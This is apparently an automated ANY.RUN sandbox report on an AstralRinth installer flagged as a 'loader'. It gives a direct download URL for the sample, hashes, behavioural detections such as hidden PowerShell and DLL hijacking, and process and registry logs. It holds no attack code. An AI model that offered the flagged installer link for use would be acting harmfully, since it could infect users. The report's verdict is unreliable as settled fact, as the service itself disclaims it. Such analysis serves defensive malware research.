URL:

https://github.com/DIDIRUS4/AstralRinth/releases/download/ARF-v0.9.3/dirty__broken_AstralRinth.App_0.9.301_x64-setup.exe

Full analysis: https://app.any.run/tasks/d480470e-d819-458c-b7aa-f2ff0c3ecb19
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: March 14, 2025, 15:30:06
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
autorun-reg
Indicators:
MD5:

6F2C6C483CA34417ED4D42AAE6E99440

SHA1:

7DC088A9D07BBE9756CB0484FA72A9E9937CBF27

SHA256:

A352DB6C58B237105EAE4BCEBB7A610A3BC5E0D2C3D6A34E7B71165D0621AF0E

SSDEEP:

3:N8tEd6GRKkWRQG0kC+0MNBbfALvGPKzonkA:2ugGKkWRP0WBbfAyionkA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 8248)

    • Changes the autorun value in the registry

      • MicrosoftEdgeUpdate.exe (PID: 8180)

    • The DLL Hijacking

      • msedgewebview2.exe (PID: 1012)

    • Scans artifacts that could help determine the target

      • msedgewebview2.exe (PID: 8840)

  • SUSPICIOUS

    • Malware-specific behavior (creating "System.dll" in Temp)

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)

    • The process creates files with name similar to system file names

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)

    • Process drops legitimate windows executable

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8404)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
      • MicrosoftEdge_X64_134.0.3124.68.exe (PID: 1568)
      • setup.exe (PID: 8892)

    • Executable content was dropped or overwritten

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8404)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
      • MicrosoftEdge_X64_134.0.3124.68.exe (PID: 1568)
      • setup.exe (PID: 8892)

    • Starts a Microsoft application from unusual location

      • MicrosoftEdgeWebview2Setup.exe (PID: 8404)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)
      • MicrosoftEdgeUpdate.exe (PID: 8180)

    • Reads security settings of Internet Explorer

      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • ShellExperienceHost.exe (PID: 8776)
      • MicrosoftEdgeUpdate.exe (PID: 3028)
      • msedgewebview2.exe (PID: 8840)

    • Disables SEHOP

      • MicrosoftEdgeUpdate.exe (PID: 4120)

    • Searches for installed software

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • setup.exe (PID: 8892)

    • There is functionality for taking screenshot (YARA)

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)

    • Reads the Windows owner or organization settings

      • msiexec.exe (PID: 8404)

    • Executes as Windows Service

      • VSSVC.exe (PID: 8600)

    • Changes default file association

      • msiexec.exe (PID: 8404)

    • Starts process via Powershell

      • powershell.exe (PID: 8248)

    • Manipulates environment variables

      • powershell.exe (PID: 8248)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 8248)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 8248)

    • Starts itself from another location

      • MicrosoftEdgeUpdate.exe (PID: 8180)

    • Starts POWERSHELL.EXE for commands execution

      • msiexec.exe (PID: 8404)

    • The process bypasses the loading of PowerShell profile settings

      • msiexec.exe (PID: 8404)

    • Creates/Modifies COM task schedule object

      • MicrosoftEdgeUpdate.exe (PID: 8432)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 6980)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 9152)

    • Application launched itself

      • setup.exe (PID: 8892)
      • MicrosoftEdgeUpdate.exe (PID: 3028)
      • msedgewebview2.exe (PID: 8840)

    • Creates a software uninstall entry

      • setup.exe (PID: 8892)

  • INFO

    • Application launched itself

      • firefox.exe (PID: 4620)
      • firefox.exe (PID: 3896)

    • Checks supported languages

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8404)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • ShellExperienceHost.exe (PID: 8776)
      • msiexec.exe (PID: 8404)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 6980)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 9152)
      • MicrosoftEdgeUpdate.exe (PID: 8628)
      • MicrosoftEdgeUpdate.exe (PID: 3016)
      • MicrosoftEdgeUpdate.exe (PID: 3028)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 5796)
      • setup.exe (PID: 8892)
      • setup.exe (PID: 2148)
      • MicrosoftEdgeUpdate.exe (PID: 6480)
      • AstralRinth App.exe (PID: 840)
      • msedgewebview2.exe (PID: 8840)
      • msedgewebview2.exe (PID: 2692)
      • msedgewebview2.exe (PID: 1012)
      • msedgewebview2.exe (PID: 8636)
      • msedgewebview2.exe (PID: 8984)

    • The sample compiled with english language support

      • firefox.exe (PID: 3896)
      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8404)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
      • MicrosoftEdge_X64_134.0.3124.68.exe (PID: 1568)
      • setup.exe (PID: 8892)

    • Checks proxy server information

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • BackgroundTransferHost.exe (PID: 2692)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • wermgr.exe (PID: 3268)
      • powershell.exe (PID: 8248)
      • MicrosoftEdgeUpdate.exe (PID: 8628)
      • MicrosoftEdgeUpdate.exe (PID: 3028)
      • msedgewebview2.exe (PID: 8840)
      • AstralRinth App.exe (PID: 840)

    • Reads the computer name

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • msiexec.exe (PID: 8404)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
      • MicrosoftEdgeUpdate.exe (PID: 8432)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 5796)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 6980)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 9152)
      • MicrosoftEdgeUpdate.exe (PID: 8628)
      • MicrosoftEdgeUpdate.exe (PID: 3028)
      • setup.exe (PID: 8892)
      • MicrosoftEdgeUpdate.exe (PID: 6480)
      • msedgewebview2.exe (PID: 8840)
      • msedgewebview2.exe (PID: 1012)
      • msedgewebview2.exe (PID: 9152)

    • Executable content was dropped or overwritten

      • firefox.exe (PID: 3896)
      • msiexec.exe (PID: 6272)
      • msiexec.exe (PID: 8404)

    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 9184)
      • BackgroundTransferHost.exe (PID: 2692)
      • BackgroundTransferHost.exe (PID: 8612)
      • BackgroundTransferHost.exe (PID: 1760)
      • BackgroundTransferHost.exe (PID: 8920)

    • Create files in a temporary directory

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)

    • Creates files in the program directory

      • MicrosoftEdgeWebview2Setup.exe (PID: 8404)

    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 2692)
      • wermgr.exe (PID: 3268)
      • setup.exe (PID: 8892)
      • AstralRinth App.exe (PID: 840)
      • msedgewebview2.exe (PID: 8840)
      • msedgewebview2.exe (PID: 9152)

    • Reads the software policy settings

      • BackgroundTransferHost.exe (PID: 2692)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • wermgr.exe (PID: 3268)
      • MicrosoftEdgeUpdate.exe (PID: 8628)
      • MicrosoftEdgeUpdate.exe (PID: 3028)
      • MicrosoftEdgeUpdate.exe (PID: 6480)

    • Process checks computer location settings

      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
      • setup.exe (PID: 8892)
      • msedgewebview2.exe (PID: 8984)
      • msedgewebview2.exe (PID: 8840)

    • Reads Environment values

      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • MicrosoftEdgeUpdate.exe (PID: 8628)
      • MicrosoftEdgeUpdate.exe (PID: 6480)
      • AstralRinth App.exe (PID: 840)
      • msedgewebview2.exe (PID: 8840)

    • Manual execution by a user

      • msiexec.exe (PID: 6272)

    • Creates a software uninstall entry

      • msiexec.exe (PID: 8404)

    • Manages system restore points

      • SrTasks.exe (PID: 4692)

    • The executable file from the user directory is run by the Powershell process

      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)

    • Autorun file from Registry key

      • MicrosoftEdgeUpdate.exe (PID: 8180)

    • Reads the machine GUID from the registry

      • MicrosoftEdgeUpdate.exe (PID: 3028)

    • Reads product name

      • AstralRinth App.exe (PID: 840)

    • Reads CPU info

      • msedgewebview2.exe (PID: 8840)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
200
Monitored processes
53
Malicious processes
11
Suspicious processes
5

Behavior graph

Click at the process to see the details
start firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs sppextcomobj.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs slui.exe no specs astralrinth.app_0.9.301_x64-setup.exe no specs astralrinth.app_0.9.301_x64-setup.exe backgroundtransferhost.exe no specs microsoftedgewebview2setup.exe microsoftedgeupdate.exe backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs wermgr.exe backgroundtransferhost.exe no specs slui.exe shellexperiencehost.exe no specs msiexec.exe msiexec.exe msiexec.exe no specs vssvc.exe no specs srtasks.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs microsoftedgewebview2setup.exe microsoftedgeupdate.exe microsoftedgeupdate.exe no specs microsoftedgeupdatecomregistershell64.exe no specs microsoftedgeupdatecomregistershell64.exe no specs microsoftedgeupdatecomregistershell64.exe no specs microsoftedgeupdate.exe microsoftedgeupdate.exe no specs microsoftedgeupdate.exe microsoftedge_x64_134.0.3124.68.exe setup.exe setup.exe no specs microsoftedgeupdate.exe astralrinth app.exe msedgewebview2.exe no specs msedgewebview2.exe no specs msedgewebview2.exe no specs msedgewebview2.exe msedgewebview2.exe no specs msedgewebview2.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
840"C:\Program Files\AstralRinth App\AstralRinth App.exe"C:\Program Files\AstralRinth App\AstralRinth App.exe
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Description:
AstralRinth App
Version:
0.9.3
Modules
Images
c:\program files\astralrinth app\astralrinth app.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
1012"C:\Users\admin\AppData\Local\Microsoft\EdgeWebView\Application\134.0.3124.68\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\admin\AppData\Local\AstralRinthApp\EBWebView" --webview-exe-name="AstralRinth App.exe" --webview-exe-version=0.9.3 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1824,i,8179137796848779574,12893299183909058846,262144 --enable-features=ForceSWDCompWhenDCompFallbackRequired,msAggressiveCacheTrimming,msCustomDataPartition,msWebView2NoTabForScreenShare,msWindowsTaskManager --disable-features=BackForwardCache,BackgroundTabLoadingFromPerformanceManager,CloseOmniboxPopupOnInactiveAreaClick,CollectAVProductsInfo,CollectCodeIntegrityInfo,EnableHangWatcher,FilterAdsOnAbusiveSites,GetWifiProtocol,LoginDetection,MediaFoundationCameraUsageMonitoring,PreconnectToSearch,SafetyHub,SegmentationPlatform,SpareRendererForSitePerProcess,Ukm,WebPayments,msAITrackerClassification,msAbydosForWindowlessWV2,msAffirmVirtualCard,msAllowChromeWebstore,msAllowMSAPrtSSOForNonMSAProfile,msApplicationGuard,msAskBeforeClosingMultipleTabs,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeServiceRequest,msAutomaticTabFreeze,msBrowserSettingsSupported,msCoarseGeolocationService,msDataProtection,msDesktopMode,msDesktopRewards,msDisableVariationsSeedFetchThrottling,msEEProactiveHistory,msEdgeAdPlatformUI,msEdgeAddWebCapturetoCollections,msEdgeAutofillAdvancedSuggestionsBasic,msEdgeAutofillOneClickAutocomplete,msEdgeAutofillSaveGSPR100InDb,msEdgeAutofillSs,msEdgeBrowserEssentialsShowUpdateSection,msEdgeCloudConfigService,msEdgeCloudConfigServiceV2,msEdgeCohorts,msEdgeCollectionsPrismExperiment1,msEdgeCollectionsPrismOverallMigration,msEdgeComposeNext,msEdgeEnableNurturingFramework,msEdgeEnclavePrefsBasic,msEdgeEnclavePrefsNotification,msEdgeFaviconService,msEdgeHJTelemetry,msEdgeHubAppSkype,msEdgeImageEditorUI,msEdgeLinkDoctor,msEdgeMouseGestureDefaultEnabled,msEdgeMouseGestureSupported,msEdgeNewDeviceFre,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePasswordIris,msEdgePasswordIrisSaveBubble,msEdgeProngPersonalization,msEdgeReadingView,msEdgeRose,msEdgeSendTabToSelf,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingPersistentStorage,msEdgeShoppingPersonalizedCashbackBingHeader,msEdgeShoppingUI,msEdgeSmartFind,msEdgeSuperDragDefaultEnabled,msEdgeSuperDragDropSupported,msEdgeTipping,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnableCustomJobMemoryLimitsOnXbox,msEnableMIPForPDF,msEnablePdfUpsell,msEnableThirdPartyScanning,msEnableWebSignInCta,msEnableWebToBrowserSignIn,msEndpointDlp,msEntityExtraction,msExtensionTelemetryFramework,msExternalTaskManager,msFileSystemAccessDirectoryIterationBlocklistCheck,msForceBrowserSignIn,msForeignSessionsPage,msGeolocationAccessService,msGeolocationOSLocationPermissionFallback,msGeolocationSQMService,msGeolocationService,msGrowthInfraLaunchSourceLogging,msGuidedSwitchAllowed,msHubPinPersist,msImplicitSignin,msIrm,msIrmv2,msKlarnaVirtualCard,msLoadStatistics,msLogIsEdgePinnedToTaskbarOnLaunch,msMIPCrossTenantPdfViewSupport,msMdatpWebSiteDlp,msNotificationPermissionForPWA,msOnHoverSearchInSidebar,msOpenOfficeDocumentsInWebViewer,msPasswordBreachDetection,msPdfAnnotationsVisibility,msPdfDataRecovery,msPdfDigitalSignatureRead,msPdfFreeText,msPdfFreeTextForCJK,msPdfHighlightMode,msPdfInking,msPdfKeyphraseSupport,msPdfOOUI,msPdfPopupMarkerRenderer,msPdfShare,msPdfSharedLibrary,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfThumbnailCache,msPdfUnderside,msPdfViewRestore,msPersonalizationUMA,msPriceComparison,msPromptDefaultHandlerForPDF,msReactiveSearch,msReadAloud,msReadAloudPdf,msRedirectToShoreline,msRevokeExtensions,msSaasDlp,msShoppingTrigger,msShorelineSearch,msShorelineSearchFindOnPageWebUI,msShowOfflineGameEntrance,msShowReadAloudIconInAddressBar,msShowUXForAADPrtSSOForNonAADProfile,msSmartScreenProtection,msSuspendMessageForNewSessionWhenHavingPendingNavigation,msSyncEdgeCollections,msTabResourceStats,msTokenizationAutofillInlineEnabled,msTouchMode,msTriggeringSignalGenerator,msUserUnderstanding,msVideoSuperResolutionUI,msWalletBuyNow,msWalletCheckout,msWalletDiagnosticDataLogger,msWalletHubEntry,msWalletHubIntlP3,msWalletPartialCard,msWalletPasswordCategorization,msWalletPasswordCategorizationPlatformExpansion,msWalletTokenizationCardMetadata,msWalletTokenizedAutofill,msWebAssist,msWebAssistHistorySearchService,msWebOOUI,msWindowsUserActivities,msZipPayVirtualCard --variations-seed-version --mojo-platform-channel-handle=1812 /prefetch:2C:\Users\admin\AppData\Local\Microsoft\EdgeWebView\Application\134.0.3124.68\msedgewebview2.exemsedgewebview2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge WebView2
Version:
134.0.3124.68
Modules
Images
c:\users\admin\appdata\local\microsoft\edgewebview\application\134.0.3124.68\msedgewebview2.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\local\microsoft\edgewebview\application\134.0.3124.68\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1568"C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\Install\{6124428D-BF80-450D-9A94-C7D3E4A1A174}\MicrosoftEdge_X64_134.0.3124.68.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --user-levelC:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\Install\{6124428D-BF80-450D-9A94-C7D3E4A1A174}\MicrosoftEdge_X64_134.0.3124.68.exe
MicrosoftEdgeUpdate.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge Installer
Exit code:
0
Version:
134.0.3124.68
Modules
Images
c:\users\admin\appdata\local\microsoft\edgeupdate\install\{6124428d-bf80-450d-9a94-c7d3e4a1a174}\microsoftedge_x64_134.0.3124.68.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\shell32.dll
1760"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
2148C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\Install\{6124428D-BF80-450D-9A94-C7D3E4A1A174}\EDGEMITMP_93ED6.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Microsoft\EdgeWebView\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=134.0.6998.89 --annotation=exe=C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\Install\{6124428D-BF80-450D-9A94-C7D3E4A1A174}\EDGEMITMP_93ED6.tmp\setup.exe --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=134.0.3124.68 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff76956dd48,0x7ff76956dd54,0x7ff76956dd60C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\Install\{6124428D-BF80-450D-9A94-C7D3E4A1A174}\EDGEMITMP_93ED6.tmp\setup.exesetup.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge Installer
Exit code:
0
Version:
134.0.3124.68
Modules
Images
c:\users\admin\appdata\local\microsoft\edgeupdate\install\{6124428d-bf80-450d-9a94-c7d3e4a1a174}\edgemitmp_93ed6.tmp\setup.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
2552C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2692"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
2692C:\Users\admin\AppData\Local\Microsoft\EdgeWebView\Application\134.0.3124.68\msedgewebview2.exe --type=crashpad-handler --user-data-dir=C:\Users\admin\AppData\Local\AstralRinthApp\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\admin\AppData\Local\AstralRinthApp\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=134.0.6998.89 --annotation=exe=C:\Users\admin\AppData\Local\Microsoft\EdgeWebView\Application\134.0.3124.68\msedgewebview2.exe --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=134.0.3124.68 --initial-client-data=0x188,0x18c,0x190,0x164,0x198,0x7ffc85b73140,0x7ffc85b7314c,0x7ffc85b73158C:\Users\admin\AppData\Local\Microsoft\EdgeWebView\Application\134.0.3124.68\msedgewebview2.exemsedgewebview2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge WebView2
Version:
134.0.3124.68
Modules
Images
c:\users\admin\appdata\local\microsoft\edgewebview\application\134.0.3124.68\msedgewebview2.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\local\microsoft\edgewebview\application\134.0.3124.68\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3016"C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=false" /installsource otherinstallcmd /sessionid "{DAC746F5-C730-4534-8DC9-C6C5BDC0471D}" /silentC:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge Update
Exit code:
0
Version:
1.3.195.45
Modules
Images
c:\users\admin\appdata\local\microsoft\edgeupdate\microsoftedgeupdate.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\ucrtbase.dll
3028"C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" -EmbeddingC:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge Update
Exit code:
0
Version:
1.3.195.45
Modules
Images
c:\users\admin\appdata\local\microsoft\edgeupdate\microsoftedgeupdate.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\ucrtbase.dll
Total events
43 016
Read events
40 061
Write events
2 867
Delete events
88

Modification events

(PID) Process:(3896) firefox.exeKey:HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\DllPrefetchExperiment
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe
Value:
0
(PID) Process:(3896) firefox.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(9184) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(9184) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(9184) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2692) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2692) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2692) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4120) MicrosoftEdgeUpdate.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe
Operation:writeName:DisableExceptionChainValidation
Value:
0
(PID) Process:(8612) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
Executable files
419
Suspicious files
321
Text files
78
Unknown types
1

Dropped files

PID
Process
Filename
Type
3896firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-current.bin
MD5:
SHA256:
